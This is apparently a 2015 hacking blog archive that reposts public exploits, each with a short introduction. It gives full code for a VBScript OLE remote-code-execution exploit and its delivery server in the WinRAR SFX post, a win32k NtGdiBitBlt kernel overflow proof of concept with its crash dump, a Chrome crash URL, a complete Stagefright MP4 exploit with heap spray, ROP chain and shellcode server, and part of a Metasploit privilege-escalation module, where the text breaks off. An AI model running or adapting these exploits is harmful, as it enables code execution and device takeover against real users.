September 2015

Friday 25 September 2015

WinRaR SFX - OLE Code Execution Exploit

AJITH KP September 25, 2015

Hi GuyZ,
WinRaR is most popular data compression tool in Windows. Recently a new exploit has been released to exploit WinRaR SFX and execute a remote code(or file).

Video POC

Exploit

#!/usr/bin/python -w
# Title : WinRar SFX OLE Command Execution
# Date : 25/09/2015
# Author : R-73eN
# Tested on : Windows Xp SP3 with WinRAR 5.21
#
# Triggering the Vulnerability
# Run this python script
# Right click a file and then click on add to archive.
# check the 'Create SFX archive' box
# go to Advanced tab
# go to SFX options
# go to Text And icon
# copy the code that the script will generate to 'Text to display into sfx windows'
# Click OK two times and the sfx archive is generated.
# If someone opens that sfx archive a calculator should pop up.
#
# Video : https://youtu.be/vIslLJYvnaM
#
  
banner = ""
banner +="  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
  
import socket
  
CRLF = "\r\n"
#OLE command execution
exploit = """<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
   
<SCRIPT LANGUAGE="VBScript">
  
function runmumaa() 
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "calc.exe", "runas", 0
end function
</script>
   
<SCRIPT LANGUAGE="VBScript">
    
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray
   
Begin()
   
function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
   
  if(instr(info,"Win64")>0)   then
     exit   function
  end if
   
  if (instr(info,"MSIE")>0)   then 
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  else
     exit   function  
                
  end if
   
  win9x=0
   
  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
   
     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                    
     else  
          setnotsafemode()
     end if
  end if
end function
   
function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function
   
function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
       Create=True
       Exit For
    End If 
  Next
end function
   
sub testaa()
end sub
   
function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
     
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
   
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function 
   
   
function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=rum(i+8)
    i=rum(i+16)
    j=rum(i+&h134)  
    for k=0 to &h60 step 4
        j=rum(i+&h120+k)
        if(j=14) then
              j=0          
              redim  Preserve aa(a2)             
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  
   
     j=0 
              j=rum(i+&h120+k)   
            
               Exit for
           end if
   
    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
end function
   
function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
     
    redim  Preserve aa(a0) 
    redim   ab(a0)     
     
    redim  Preserve aa(a2)
     
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
             
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16             
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then    
                 If(IsObject(aa(a1)) = False ) Then             
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function
   
           end if 
        else
           if(vartype(aa(a1-1))<>0)  Then    
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
                 
       
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  
   
    redim  Preserve aa(a0)          
           
end function
   
function rum(add) 
    On Error Resume Next
    redim  Preserve aa(a2)  
     
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313       
    rum=lenb(aa(a1))  
      
    ab(0)=0
    redim  Preserve aa(a0)
end function
   
</script>
   
</body>
</html>"""
response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input(" Enter Local IP: ")
server_address = (host, 8080)
sock.bind(server_address)
print "[+] Server started " + host +  " [+]"
sock.listen(1)
print "[+] Insert this code on the 'Text to display into sfx windows' [+]"
print "\n<iframe src='http://" + host + ":8080/'> </iframe>"
print "\n[+] Waiting for request . . . [+]"
connection, client_address = sock.accept()
while True:
    connection.recv(2048)
    print "[+] Got request , sending exploit . . .[+]"
    connection.send(exploit)
    print "[+] Exploit sent , A calc should pop up . .  [+]"
    print "\nhttps://www.infogen.al/\n"
    exit(0)

Thursday 24 September 2015

Windows

Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)

AJITH KP September 24, 2015

Hi GuyZ,
I hope you have noticed recently detected vulnerabilities of Windows OS. The BOF vulnerability is detected in the NtGdiBitBlt system call.

For more details: https://code.google.com/p/google-security-research/issues/detail?id=474

The POC reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys.

POC

/*
 * compile:
 * cl.exe bug474.cpp user32.lib gdi32.lib shell32.lib
 */

#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <time.h>
 
HWND notepad(LPCSTR name) {
 char filename[1024], title[1024];
 FILE *f=0x0;
 sprintf_s(filename, 1024, "%s.txt", name);
 DWORD rc = fopen_s(&f, filename, "w");
 if(rc!=0) {
  printf("[-] failed to create temporary text file\n");
 }
 fclose(f);
 HINSTANCE inst = ShellExecuteA(0x0, "open", "notepad.exe", filename, 0x0, SW_SHOW);
 if(inst < (HINSTANCE)33) {
  printf("[-] failed to start notepad\n");
 }
 while(1) {
 sprintf_s(title, 1024, "%s - Notepad", name);
 HWND hwnd = FindWindowA(0x0, title);
 if(hwnd) {
  return hwnd;
 }
 sprintf_s(title, 1024, "%s.txt - Notepad", name);
 hwnd = FindWindowA(0x0, title);
 if(hwnd) {
  //printf("[-] failed to retrieve handle to notepad window\n");
  //return 0x0;
  return hwnd;
 }
 }
 return 0x0;
}


__declspec(noinline) int __stdcall NtGdiSetLayout(HDC hdc, DWORD d0, DWORD d1) {
  __asm {
   push d1
   push d0
   push hdc
  push 0x0
  mov eax, 0x1123
  mov edx, 0x7ffe0300
  call dword ptr [edx]
  add esp, 0x10
 }
}

__declspec(noinline) int __stdcall NtGdiBitBlt(HDC hdc, DWORD dw1, DWORD dw2,DWORD dw3,DWORD dw4,HDC hdc2,DWORD dw6,DWORD dw7, DWORD dw8) {
 __asm {
  push dw8
  push dw7
  push dw6
  push hdc2
  push dw4
  push dw3
  push dw2
  push dw1
  push hdc
  push 0x0 
  mov eax, 0x100e
  mov edx, 0x7ffe0300
  call dword ptr [edx]
  add esp, 0x30
 }
}
int _tmain(int argc, _TCHAR* argv[])
{
 HDC hdc1 = CreateDCA(0,"Microsoft XPS Document Writer", 0, 0);
 printf("[-] hdc1: %08x\n", hdc1);
 NtGdiSetLayout(hdc1, 0x6d, 0xc5abb63);
 HWND hwnd1 = notepad("test1");
 printf("[-] hwnd1: %08x\n", hwnd1);
 HDC hdc2 = GetDC(hwnd1);
 printf("[-] hdc2: %08x\n", hdc2);
 NtGdiBitBlt(hdc1, 0, 0xae, 0x4c, 0x1a, hdc2, 0xb2, 0x47, 0x330008);
}

Details

*** Fatal System Error: 0x000000d6
                       (0xFFA0B1B9,0x00000001,0x947F3EB4,0x00000000)

Driver at fault: 
***    win32k.sys - Address 947F3EB4 base at 94730000, DateStamp 00000000
.
Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

Connected to Windows 7 7601 x86 compatible target at (Sun Jun 28 23:31:46.512 2015 (UTC + 2:00)), ptr64 FALSE
Loading Kernel Symbols
...............................................................
................................................................
.........................
Loading User Symbols
........................................
Loading unloaded module list
...............
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck D6, {ffa0b1b9, 1, 947f3eb4, 0}

*** WARNING: Unable to verify checksum for a10.exe
*** ERROR: Module load completed but symbols could not be loaded for a10.exe
Probably caused by : win32k.sys ( win32k!memcpy+74 )

Followup: MachineOwner
---------

Assertion: *** DPC watchdog timeout
    This is NOT a break in update time
    This is most likely a BUG in an ISR
    Perform a stack trace to find the culprit
    The period will be doubled on continuation
    Use gh to continue!!

nt!KeAccumulateTicks+0x3c5:
82a909ec cd2c            int     2Ch
kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffa0b1b9, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 947f3eb4, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


WRITE_ADDRESS:  ffa0b1b9 Special pool

FAULTING_IP: 
win32k!memcpy+74
947f3eb4 8807            mov     byte ptr [edi],al

MM_INTERNAL_CODE:  0

IMAGE_NAME:  win32k.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  55635516

MODULE_NAME: win32k

FAULTING_MODULE: 94730000 win32k

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0xD6

PROCESS_NAME:  a10.exe

CURRENT_IRQL:  1c

TRAP_FRAME:  9f92edfc -- (.trap 0xffffffff9f92edfc)
ErrCode = 00000002
eax=000000ff ebx=ffa0b1b9 ecx=00000005 edx=00000001 esi=9f92eff5 edi=ffa0b1b9
eip=947f3eb4 esp=9f92ee70 ebp=9f92ee78 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
win32k!memcpy+0x74:
947f3eb4 8807            mov     byte ptr [edi],al          ds:0023:ffa0b1b9=??
Resetting default scope

LAST_CONTROL_TRANSFER:  from 82a8feb3 to 82a909ec

STACK_TEXT:  
9f92e820 82a8feb3 0002625a 00000000 00010300 nt!KeAccumulateTicks+0x3c5
9f92e860 82a8fd60 82e430a8 0f77c71d 00000000 nt!KeUpdateRunTime+0x145
9f92e8b8 82a8f563 9f92e802 9f92e802 000000d1 nt!KeUpdateSystemTime+0x613
9f92e8b8 82e430a8 9f92e802 9f92e802 000000d1 nt!KeUpdateSystemTimeAssist+0x13
9f92e93c 82e31b8c 00001000 00000000 9f92e99c hal!READ_PORT_USHORT+0x8
9f92e94c 82e31cf5 82af4582 c4073ec3 00000065 hal!HalpCheckPowerButton+0x2e
9f92e950 82af4582 c4073ec3 00000065 00000000 hal!HaliHaltSystem+0x7
9f92e99c 82af5029 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x73
9f92ed60 82aa2ff9 00000050 ffa0b1b9 00000001 nt!KeBugCheck2+0x68b
9f92ede4 82a55a88 00000001 ffa0b1b9 00000000 nt!MmAccessFault+0x104
9f92ede4 947f3eb4 00000001 ffa0b1b9 00000000 nt!KiTrap0E+0xdc
9f92ee78 947c9a8a ffa0b1b9 9f92eff5 00000008 win32k!memcpy+0x74
9f92eed8 9477d91c 00000008 0b06bcfc 9f92f4a0 win32k!vSrcCopyS1D1LtoR+0x1eb
9f92f480 9477cf6e 9f92f608 00000019 ffa0ada8 win32k!BltLnkRect+0x91c
9f92f70c 947ec14c 00000000 fc2d2000 00000000 win32k!BltLnk+0x78b
9f92f798 9488811d 00000000 fc2d2010 00000000 win32k!EngBitBlt+0x4c5
9f92f834 9487dee2 ffa0adb8 ff0fadb8 00000000 win32k!EngStretchBltROP+0x282
9f92f914 947b0091 00000000 9f92fa54 94887e9b win32k!BLTRECORD::bStretch+0x459
9f92fa90 947acd2c ab21078b 00000000 000000ae win32k!GreStretchBltInternal+0x785
9f92facc 94807ac7 ab21078b 00000000 000000ae win32k!GreStretchBlt+0x30
9f92fbcc 947e4cda ab21078b 00000000 000000ae win32k!NtGdiBitBltInternal+0x765
9f92fc00 82a528a6 ab21078b 00000000 000000ae win32k!NtGdiBitBlt+0x2f
9f92fc00 77257074 ab21078b 00000000 000000ae nt!KiSystemServicePostCall
0018f7f8 011911cc 00000000 ab21078b 00000000 ntdll!KiFastSystemCallRet
WARNING: Stack unwind information not available. Following frames may be wrong.
0018f828 0119127e ab21078b 00000000 000000ae a10+0x11cc
0018f860 0119165d 00000001 0027efa8 00283738 a10+0x127e
0018f8a8 7577ee6c 7ffd9000 0018f8f4 7727399b a10+0x165d
0018f8b4 7727399b 7ffd9000 7739f8b6 00000000 kernel32!BaseThreadInitThunk+0xe
0018f8f4 7727396e 011916da 7ffd9000 00000000 ntdll!__RtlUserThreadStart+0x70
0018f90c 00000000 011916da 7ffd9000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND:  kb

FOLLOWUP_IP: 
win32k!memcpy+74
947f3eb4 8807            mov     byte ptr [edi],al

SYMBOL_STACK_INDEX:  b

SYMBOL_NAME:  win32k!memcpy+74

FOLLOWUP_NAME:  MachineOwner

FAILURE_BUCKET_ID:  0xD6_VRF_win32k!memcpy+74

BUCKET_ID:  0xD6_VRF_win32k!memcpy+74

Followup: MachineOwner
---------

Sunday 20 September 2015

Vulnerability

Crash Vulnerability found in Google Chrome

AJITH KP September 20, 2015

Hello GuyZ,
A new crash vulnerability is found in Google Chrome. This is not a serious vulnerability. But it crash the browser and close browser immediately. This vulnerability is detected by Andris Atteka.

Vulnerability Report: https://code.google.com/p/chromium/issues/detail?id=533361

If you want to test the vulnerability just copy the URL( http://aaa/%%30%30 ), paste it in URL bar and just press `Enter` key

Friday 18 September 2015

Vulnerability

Android libstagefright - Integer Overflow Remote Code Execution

AJITH KP September 18, 2015

Hi GuyZ,
Recently an RCE vulnerability have detected in Android named `Stagefright`. Yesterday one more 0day RCE exploit has been released named `libstagefright`.

Exploit Code

#!/usr/bin/python2
  
import cherrypy
import os
import pwnlib.asm as asm
import pwnlib.elf as elf
import sys
import struct
  
  
with open('shellcode.bin', 'rb') as tmp:
  shellcode = tmp.read()
  
while len(shellcode) % 4 != 0:
  shellcode += '\x00'
  
# heap grooming configuration
alloc_size = 0x20
groom_count = 0x4
spray_size = 0x100000
spray_count = 0x10
  
# address of the buffer we allocate for our shellcode
mmap_address = 0x90000000
  
# addresses that we need to predict
libc_base = 0xb6ebd000
spray_address = 0xb3000000
  
# ROP gadget addresses
stack_pivot = None
pop_pc = None
pop_r0_r1_r2_r3_pc = None
pop_r4_r5_r6_r7_pc = None
ldr_lr_bx_lr = None
ldr_lr_bx_lr_stack_pad = 0
mmap64 = None
memcpy = None
  
def find_arm_gadget(e, gadget):
  gadget_bytes = asm.asm(gadget, arch='arm')
  gadget_address = None
  for address in e.search(gadget_bytes):
    if address % 4 == 0:
      gadget_address = address
      if gadget_bytes == e.read(gadget_address, len(gadget_bytes)):
        print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')
        break
  return gadget_address
  
def find_thumb_gadget(e, gadget):
  gadget_bytes = asm.asm(gadget, arch='thumb')
  gadget_address = None
  for address in e.search(gadget_bytes):
    if address % 2 == 0:
      gadget_address = address + 1
      if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)):
        print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')
        break
  return gadget_address
    
def find_gadget(e, gadget):
  gadget_address = find_thumb_gadget(e, gadget)
  if gadget_address is not None:
    return gadget_address
  return find_arm_gadget(e, gadget)
  
def find_rop_gadgets(path):
  global memcpy
  global mmap64
  global stack_pivot
  global pop_pc
  global pop_r0_r1_r2_r3_pc
  global pop_r4_r5_r6_r7_pc
  global ldr_lr_bx_lr
  global ldr_lr_bx_lr_stack_pad
  
  e = elf.ELF(path)
  e.address = libc_base
  
  memcpy = e.symbols['memcpy']
  print '[*] memcpy : 0x{:08x}'.format(memcpy)
  mmap64 = e.symbols['mmap64']
  print '[*] mmap64 : 0x{:08x}'.format(mmap64)
  
  # .text:00013344    ADD             R2, R0, #0x4C
  # .text:00013348    LDMIA           R2, {R4-LR}
  # .text:0001334C    TEQ             SP, #0
  # .text:00013350    TEQNE           LR, #0
  # .text:00013354    BEQ             botch_0
  # .text:00013358    MOV             R0, R1
  # .text:0001335C    TEQ             R0, #0
  # .text:00013360    MOVEQ           R0, #1
  # .text:00013364    BX              LR
  
  pivot_asm = ''
  pivot_asm += 'add   r2, r0, #0x4c\n'
  pivot_asm += 'ldmia r2, {r4 - lr}\n'
  pivot_asm += 'teq   sp, #0\n'
  pivot_asm += 'teqne lr, #0'
  stack_pivot = find_arm_gadget(e, pivot_asm)
  print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot)
  
  pop_pc_asm = 'pop {pc}'
  pop_pc = find_gadget(e, pop_pc_asm)
  print '[*] pop_pc : 0x{:08x}'.format(pop_pc)
  
  pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}')
  print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc)
  
  pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}')
  print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc)
  
  ldr_lr_bx_lr_stack_pad = 0
  for i in range(0, 0x100, 4):
    ldr_lr_bx_lr_asm =  'ldr lr, [sp, #0x{:08x}]\n'.format(i)
    ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8)
    ldr_lr_bx_lr_asm += 'bx  lr'
    ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm)
    if ldr_lr_bx_lr is not None:
      ldr_lr_bx_lr_stack_pad = i
      break
    
def pad(size):
  return '#' * size
  
def pb32(val):
  return struct.pack(">I", val)
  
def pb64(val):
  return struct.pack(">Q", val)
  
def p32(val):
  return struct.pack("<I", val)
  
def p64(val):
  return struct.pack("<Q", val)
  
def chunk(tag, data, length=0):
  if length == 0:
    length = len(data) + 8
  if length > 0xffffffff:
    return pb32(1) + tag + pb64(length)+ data
  return pb32(length) + tag + data
  
def alloc_avcc(size):
  avcc = 'A' * size
  return chunk('avcC', avcc)
  
def alloc_hvcc(size):
  hvcc = 'H' * size
  return chunk('hvcC', hvcc)
  
def sample_table(data):
  stbl = ''
  stbl += chunk('stco', '\x00' * 8)
  stbl += chunk('stsc', '\x00' * 8)
  stbl += chunk('stsz', '\x00' * 12)
  stbl += chunk('stts', '\x00' * 8)
  stbl += data
  return chunk('stbl', stbl)
  
def memory_leak(size):
  pssh = 'leak'
  pssh += 'L' * 16
  pssh += pb32(size)
  pssh += 'L' * size
  return chunk('pssh', pssh)
  
def heap_spray(size):
  pssh = 'spry'
  pssh += 'S' * 16
  pssh += pb32(size)
  
  page = ''
  
  nop = asm.asm('nop', arch='thumb')
  while len(page) < 0x100:
    page += nop
  page += shellcode
  while len(page) < 0xed0:
    page += '\xcc'
  
  # MPEG4DataSource fake vtable
  page += p32(stack_pivot)
  
  # pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)
  
  # mmap64(mmap_address, 
  #        0x1000,
  #        PROT_READ | PROT_WRITE | PROT_EXECUTE,
  #        MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS,
  #        -1,
  #        0);
  
  page += p32(mmap_address)             # r0 = address
  page += p32(0x1000)                   # r1 = size
  page += p32(7)                        # r2 = protection
  page += p32(0x32)                     # r3 = flags
  page += p32(ldr_lr_bx_lr)             # pc
  
  page += pad(ldr_lr_bx_lr_stack_pad)
  page += p32(pop_r4_r5_r6_r7_pc)       # lr
  page += pad(4)
  
  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(mmap64)                   # pc
  
  page += p32(0xffffffff)               # fd      (and then r4)
  page += pad(4)                        # padding (and then r5)
  page += p64(0)                        # offset  (and then r6, r7)
  page += p32(pop_r0_r1_r2_r3_pc)       # pc
  
  # memcpy(shellcode_address, 
  #        spray_address + len(rop_stack),
  #        len(shellcode));
  
  page += p32(mmap_address)             # r0 = dst
  page += p32(spray_address - 0xed0)    # r1 = src
  page += p32(0xed0)                    # r2 = size
  page += p32(0x33333333)               # r3
  page += p32(ldr_lr_bx_lr)             # pc
  
  page += pad(ldr_lr_bx_lr_stack_pad)
  page += p32(pop_r4_r5_r6_r7_pc)       # lr
  page += pad(4)
  
  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(memcpy)                   # pc
  
  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(mmap_address + 1)         # pc
  
  while len(page) < 0x1000:
    page += '#'
  
  pssh += page * (size // 0x1000)
  
  return chunk('pssh', pssh)
  
def exploit_mp4():
  ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex"))
  
  trak = ''
  
  # heap spray so we have somewhere to land our corrupted vtable 
  # pointer
  
  # yes, we wrap this in a sample_table for a reason; the 
  # NuCachedSource we will be using otherwise triggers calls to mmap,
  # leaving our large allocations non-contiguous and making our chance
  # of failure pretty high. wrapping in a sample_table means that we
  # wrap the NuCachedSource with an MPEG4Source, making a single 
  # allocation that caches all the data, doubling our heap spray 
  # effectiveness :-)
  trak += sample_table(heap_spray(spray_size) * spray_count)
  
  # heap groom for our MPEG4DataSource corruption
  
  # get the default size allocations for our MetaData::typed_data 
  # groom allocations out of the way first, by allocating small blocks
  # instead.
  trak += alloc_avcc(8)
  trak += alloc_hvcc(8)
  
  # we allocate the initial tx3g chunk here; we'll use the integer 
  # overflow so that the allocated buffer later is smaller than the 
  # original size of this chunk, then overflow all of the following 
  # MPEG4DataSource object and the following pssh allocation; hence why
  # we will need the extra groom allocation (so we don't overwrite 
  # anything sensitive...)
  
  # | tx3g | MPEG4DataSource | pssh |
  overflow = 'A' * 24
  
  # | tx3g ----------------> | pssh |
  overflow += p32(spray_address)         # MPEG4DataSource vtable ptr
  overflow += '0' * 0x48
  overflow += '0000'                    # r4
  overflow += '0000'                    # r5
  overflow += '0000'                    # r6
  overflow += '0000'                    # r7
  overflow += '0000'                    # r8
  overflow += '0000'                    # r9
  overflow += '0000'                    # r10
  overflow += '0000'                    # r11
  overflow += '0000'                    # r12
  overflow += p32(spray_address + 0x20) # sp
  overflow += p32(pop_pc)               # lr
  
  trak += chunk("tx3g", overflow)
  
  # defragment the for alloc_size blocks, then make our two
  # allocations. we end up with a spurious block in the middle, from
  # the temporary ABuffer deallocation.
  
  # | pssh | - | pssh |
  trak += memory_leak(alloc_size) * groom_count
  
  # | pssh | - | pssh | .... | avcC |
  trak += alloc_avcc(alloc_size)
  
  # | pssh | - | pssh | .... | avcC | hvcC |
  trak += alloc_hvcc(alloc_size)
  
  # | pssh | - | pssh | pssh | avcC | hvcC | pssh |
  trak += memory_leak(alloc_size) * 8
  
  # | pssh | - | pssh | pssh | avcC | .... |
  trak += alloc_hvcc(alloc_size * 2)
  
  # entering the stbl chunk triggers allocation of an MPEG4DataSource
  # object
  
  # | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |
  stbl = ''
  
  # | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |
  stbl += alloc_avcc(alloc_size * 2)
  
  # | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |
  # | pssh | - | pssh | pssh | tx3g ----------------> |
  overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff)
  stbl += chunk("tx3g", '', length = overflow_length)
  
  trak += chunk('stbl', stbl)
  
  return ftyp + chunk('trak', trak)
  
index_page = '''
<!DOCTYPE html>
<html>
  <head>
    <title>Stagefrightened!</title>
  </head>
  <body>
    <script>
    window.setTimeout('location.reload(true);', 4000);
    </script>
    <iframe src='/exploit.mp4'></iframe>
  </body>
</html>
'''
  
class ExploitServer(object):
  
  exploit_file = None
  exploit_count = 0
  
  @cherrypy.expose
  def index(self):
    self.exploit_count += 1
    print '*' * 80
    print 'exploit attempt: ' + str(self.exploit_count)
    print '*' * 80
    return index_page
  
  @cherrypy.expose(["exploit.mp4"])
  def exploit(self):
    cherrypy.response.headers['Content-Type'] = 'video/mp4'
    cherrypy.response.headers['Content-Encoding'] = 'gzip'
  
    if self.exploit_file is None:
      exploit_uncompressed = exploit_mp4()
      with open('exploit_uncompressed.mp4', 'wb') as tmp:
        tmp.write(exploit_uncompressed)
      os.system('gzip exploit_uncompressed.mp4')
      with open('exploit_uncompressed.mp4.gz', 'rb') as tmp:
        self.exploit_file = tmp.read()
      os.system('rm exploit_uncompressed.mp4.gz')
  
    return self.exploit_file
  
def main():
  find_rop_gadgets('libc.so')
  with open('exploit.mp4', 'wb') as tmp:
    tmp.write(exploit_mp4())
  cherrypy.quickstart(ExploitServer())
  
if __name__ == '__main__':
  main()

Windows

Microsoft Windows Font Driver Buffer Overflow

AJITH KP September 18, 2015

Hi GuyZ,
I think something went wrong in Microsoft security. Now adays the hackers are highly concentrates on Windows bug detection. New Buffer Overflow exploit also detected in Microsoft Windows.

Metasploit Exploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Local
  Rank = ManualRanking
 
  WIN32K_VERSIONS = [
    '6.3.9600.17393',
    '6.3.9600.17630',
    '6.3.9600.17694',
    '6.3.9600.17796',
    '6.3.9600.17837',
    '6.3.9600.17915'
  ]
 
  NT_VERSIONS = [
    '6.3.9600.17415',
    '6.3.9600.17630',
    '6.3.9600.17668',
    '6.3.9600.17936'
  ]
 
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection
 
  def initialize(info={})
    super(update_info(info, {
      'Name'            => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
      'Description'     => %q{
        This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
        a malformed font. The vulnerability was exploited by the hacking team and disclosed on
        the july data leak. This module has been tested successfully on vulnerable builds of
        Windows 8.1 x64.
      },
      'License'         => MSF_LICENSE,
      'Author'          => [
          'Eugene Ching',    # vulnerability discovery and exploit
          'Mateusz Jurczyk', # vulnerability discovery
          'Cedric Halbronn', # vulnerability and exploit analysis
          'juan vazquez'     # msf module
        ],
      'Arch'            => ARCH_X86_64,
      'Platform'        => 'win',
      'SessionTypes'    => [ 'meterpreter' ],
      'DefaultOptions'  => {
          'EXITFUNC'    => 'thread',
        },
      'Targets'         => [
          [ 'Windows 8.1 x64',  { } ]
        ],
      'Payload'         => {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'      => [
          ['CVE', '2015-2426'],
          ['CVE', '2015-2433'],
          ['MSB', 'MS15-078'],
          ['MSB', 'MS15-080'],
          ['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
        ],
      'DisclosureDate'  => 'Jul 11 2015',
      'DefaultTarget'   => 0
    }))
  end
 
  def patch_win32k_offsets(dll)
    @win32k_offsets.each do |k, v|
      case k
      when 'info_leak'
        dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
      when 'pop_rax_ret'
        dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp'
        dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool'
        dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
      when 'pop_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
      when 'deref_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_into_rcx'
        dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
      when 'pop_rbx_ret'
        dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
